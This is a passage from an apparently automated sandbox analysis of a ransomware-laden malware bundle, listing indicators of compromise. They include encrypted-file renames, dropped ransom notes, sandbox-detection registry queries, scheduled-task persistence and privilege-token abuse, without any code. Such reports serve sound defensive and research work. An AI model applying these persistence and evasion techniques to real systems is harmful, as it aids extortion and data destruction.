Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.11591.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppPackageSplashScreen.scale-200_contrast-white.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_x64__8wekyb3d8bbwe\Images\PowerAutomateAppIcon.scale-100.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Xbox.TCUI_1.24.10001.0_x64__8wekyb3d8bbwe\winsdkfb\FBCursors.xml csrss.exe File opened for modification C:\Program Files\WindowsApps\MicrosoftWindows.Client.WebExperience_321.14700.0.9_x64__cw5n1h2txyewy\Dashboard\WebContent\node_modules\@fluentui\react\lib-commonjs\utilities\groupedList\GroupedListUtility.js csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\BORDERS\MSART7.BDR csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png.payfast290.2B2-819-10A csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\SEGOEUISL.TTF csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Paint_10.2104.17.0_x64__8wekyb3d8bbwe\Assets\PaintAppList.targetsize-96_altform-unplated.png csrss.exe File created C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.41203.0_x64__8wekyb3d8bbwe\x86\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.13426.20920.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarMediumTile.scale-125.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019VL_KMS_Client_AE-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsAlarms_1.0.36.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AlarmsLargeTile.scale-125.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_SubTrial-ppd.xrm-ms csrss.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_12104.1001.1.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\LibrarySquare150x150Logo.scale-125.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-60_altform-unplated.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.40978.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-72.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.2105.4.0_x64__8wekyb3d8bbwe\Assets\PeopleAppList.targetsize-24.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.PowerAutomateDesktop_1.0.65.0_neutral_split.scale-100_8wekyb3d8bbwe\Images\contrast-black\PowerAutomateSquare50x50Logo.scale-100.png csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\LEELAWDB.TTF.payfast290.2B2-819-10A csrss.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsSoundRecorder_1.0.38.0_neutral_split.scale-200_8wekyb3d8bbwe\Assets\VoiceRecorderAppList.scale-200_contrast-white.png csrss.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_1.0.28.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-60_altform-lightunplated.png csrss.exe File created C:\Program Files\WindowsApps\Microsoft.YourPhone_1.21052.124.0_x64__8wekyb3d8bbwe\Assets\Toasts\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-ppd.xrm-ms csrss.exe -
Drops file in Windows directory 2 IoCs
Processes:
csrss.exeWerFault.exedescription ioc process File created C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT csrss.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5844 5716 WerFault.exe Mon00f61d292f523.exe 3772 5128 WerFault.exe Mon001af0f6251.exe 4008 5960 WerFault.exe Mon00a4b905d6fcf0a9.exe 2224 6772 WerFault.exe lgqw6xe2U_T8KcnVrPXg4e3S.exe 3268 6468 WerFault.exe CqQvCDQIKdt4Ibiq7B0qzude.exe 1188 6440 WerFault.exe Nq_3F5ekjxAFw0C9puS4Fehc.exe 7024 5336 WerFault.exe rundll32.exe 2000 6356 WerFault.exe iABSwCq9xEEiihZKEGl3NhzE.exe 796 6432 WerFault.exe 4ZZBKS8grL61WRswRHXgKOPQ.exe 6532 6812 WerFault.exe WeitOOFgEpAbhQaUpI5l8OGp.exe 5544 6468 WerFault.exe rundll32.exe 3952 5228 WerFault.exe 6BEB.exe 5156 4884 WerFault.exe 7989597.exe 1556 2932 WerFault.exe 2589432.exe 2536 6444 WerFault.exe explorer.exe 5944 496 WerFault.exe 9540.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Xi4HqKZZXc1thEIujg7aeJVU.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Xi4HqKZZXc1thEIujg7aeJVU.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Xi4HqKZZXc1thEIujg7aeJVU.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Xi4HqKZZXc1thEIujg7aeJVU.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exewerfault.exeWerFault.exeWerFault.exeWerFault.exeexplorer.exeWerFault.exeWerFault.exeWerFault.execmd.exeWerFault.exeWO~L~OYJWS8EVL1.eXeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString werfault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz werfault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WO~L~OYJWS8EVL1.eXe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WO~L~OYJWS8EVL1.eXe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WO~L~OYJWS8EVL1.eXe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 1196 schtasks.exe 6564 schtasks.exe 1192 schtasks.exe 5388 schtasks.exe -
Enumerates system info in registry 2 TTPs 34 IoCs
Processes:
werfault.exeWerFault.execmd.exeexplorer.exeWO~L~OYJWS8EVL1.eXeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU werfault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WO~L~OYJWS8EVL1.eXe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU explorer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS werfault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WO~L~OYJWS8EVL1.eXe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2840 taskkill.exe -
Processes:
mstsc.exedescription ioc process Key created \Registry\User\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 mstsc.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
svchost.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe -
Modifies registry class 6 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\ApplicationFrame\windows.immersivecontrolpanel_cw5n1h2txyewy!mic = 2c00000000000000020000000083ffff0083ffffffffffffffffffff280000002000000058030000a1020000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeWerFault.exeWinHoster.exeWerFault.exeWerFault.exetest.exepid process 3220 powershell.exe 3220 powershell.exe 5844 WerFault.exe 5844 WerFault.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 6136 WinHoster.exe 3220 powershell.exe 3772 WerFault.exe 3772 WerFault.exe 4008 WerFault.exe 4008 WerFault.exe 3932 test.exe 3932 test.exe 3932 test.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3120 Explorer.EXE -
Suspicious behavior: MapViewOfSection 40 IoCs
Processes:
test.exeXi4HqKZZXc1thEIujg7aeJVU.exemstsc.exeExplorer.EXEpid process 3932 test.exe 3932 test.exe 3932 test.exe 6508 Xi4HqKZZXc1thEIujg7aeJVU.exe 908 mstsc.exe 908 mstsc.exe 3120 Explorer.EXE 3120 Explorer.EXE 908 mstsc.exe 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 908 mstsc.exe 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 3120 Explorer.EXE 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe 908 mstsc.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Mon0015a1e17ea5.exe2.exepowershell.exeWerFault.exeexplorer.exetest.exeDllHost.exeExplorer.EXEiABSwCq9xEEiihZKEGl3NhzE.exemstsc.exe4.exef9kpkTIv_7sacBa4AgtedA10.exeBearVpn 3.exeChrome 5.exedescription pid process Token: SeDebugPrivilege 5792 Mon0015a1e17ea5.exe Token: SeDebugPrivilege 5544 2.exe Token: SeDebugPrivilege 3220 powershell.exe Token: SeRestorePrivilege 5844 WerFault.exe Token: SeBackupPrivilege 5844 WerFault.exe Token: SeBackupPrivilege 5844 WerFault.exe Token: SeDebugPrivilege 5544 explorer.exe Token: SeDebugPrivilege 3932 test.exe Token: SeDebugPrivilege 5664 DllHost.exe Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeDebugPrivilege 6356 iABSwCq9xEEiihZKEGl3NhzE.exe Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeDebugPrivilege 908 mstsc.exe Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeDebugPrivilege 1308 4.exe Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeDebugPrivilege 6240 f9kpkTIv_7sacBa4AgtedA10.exe Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeDebugPrivilege 1428 BearVpn 3.exe Token: SeDebugPrivilege 5876 Chrome 5.exe Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE Token: SeCreatePagefilePrivilege 3120 Explorer.EXE Token: SeShutdownPrivilege 3120 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Amica.exe.comAmica.exe.comcsrss.exeAmica.exe.comUno.exe.comAmica.exe.comUno.exe.comUno.exe.comAmica.exe.comAmica.exe.comUno.exe.comUno.exe.comAmica.exe.comUno.exe.comexplorer.exeUno.exe.comAmica.exe.comUno.exe.comConhost.exeUno.exe.comUno.exe.comUno.exe.compid process 1944 Amica.exe.com 1944 Amica.exe.com 1944 Amica.exe.com 4808 Amica.exe.com 4808 Amica.exe.com 4808 Amica.exe.com 2604 csrss.exe 2604 csrss.exe 2604 csrss.exe 6404 Amica.exe.com 6404 Amica.exe.com 6404 Amica.exe.com 6124 Uno.exe.com 6124 Uno.exe.com 6124 Uno.exe.com 6432 Amica.exe.com 6432 Amica.exe.com 6432 Amica.exe.com 6088 Uno.exe.com 6088 Uno.exe.com 6088 Uno.exe.com 5512 Uno.exe.com 5512 Uno.exe.com 5512 Uno.exe.com 3476 Amica.exe.com 3476 Amica.exe.com 3476 Amica.exe.com 772 Amica.exe.com 3984 Uno.exe.com 772 Amica.exe.com 772 Amica.exe.com 3984 Uno.exe.com 3984 Uno.exe.com 1996 Uno.exe.com 1996 Uno.exe.com 1996 Uno.exe.com 1732 Amica.exe.com 1732 Amica.exe.com 1732 Amica.exe.com 2248 Uno.exe.com 2248 Uno.exe.com 2248 Uno.exe.com 6604 explorer.exe 6604 explorer.exe 6604 explorer.exe 5468 Uno.exe.com 5468 Uno.exe.com 5468 Uno.exe.com 5984 Amica.exe.com 5984 Amica.exe.com 5984 Amica.exe.com 5988 Uno.exe.com 5988 Uno.exe.com 5988 Uno.exe.com 6460 Conhost.exe 6460 Conhost.exe 6460 Conhost.exe 5940 Uno.exe.com 5940 Uno.exe.com 5940 Uno.exe.com 1564 Uno.exe.com 1564 Uno.exe.com 1564 Uno.exe.com 6316 Uno.exe.com -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Amica.exe.comAmica.exe.comcsrss.exeAmica.exe.comUno.exe.comAmica.exe.comUno.exe.comUno.exe.comAmica.exe.comAmica.exe.comUno.exe.comUno.exe.comAmica.exe.comUno.exe.comexplorer.exeUno.exe.comAmica.exe.comUno.exe.comConhost.exeUno.exe.comUno.exe.comUno.exe.compid process 1944 Amica.exe.com 1944 Amica.exe.com 1944 Amica.exe.com 4808 Amica.exe.com 4808 Amica.exe.com 4808 Amica.exe.com 2604 csrss.exe 2604 csrss.exe 2604 csrss.exe 6404 Amica.exe.com 6404 Amica.exe.com 6404 Amica.exe.com 6124 Uno.exe.com 6124 Uno.exe.com 6124 Uno.exe.com 6432 Amica.exe.com 6432 Amica.exe.com 6432 Amica.exe.com 6088 Uno.exe.com 6088 Uno.exe.com 6088 Uno.exe.com 5512 Uno.exe.com 5512 Uno.exe.com 5512 Uno.exe.com 3476 Amica.exe.com 3476 Amica.exe.com 3476 Amica.exe.com 772 Amica.exe.com 3984 Uno.exe.com 772 Amica.exe.com 772 Amica.exe.com 3984 Uno.exe.com 3984 Uno.exe.com 1996 Uno.exe.com 1996 Uno.exe.com 1996 Uno.exe.com 1732 Amica.exe.com 1732 Amica.exe.com 1732 Amica.exe.com 2248 Uno.exe.com 2248 Uno.exe.com 2248 Uno.exe.com 6604 explorer.exe 6604 explorer.exe 6604 explorer.exe 5468 Uno.exe.com 5468 Uno.exe.com 5468 Uno.exe.com 5984 Amica.exe.com 5984 Amica.exe.com 5984 Amica.exe.com 5988 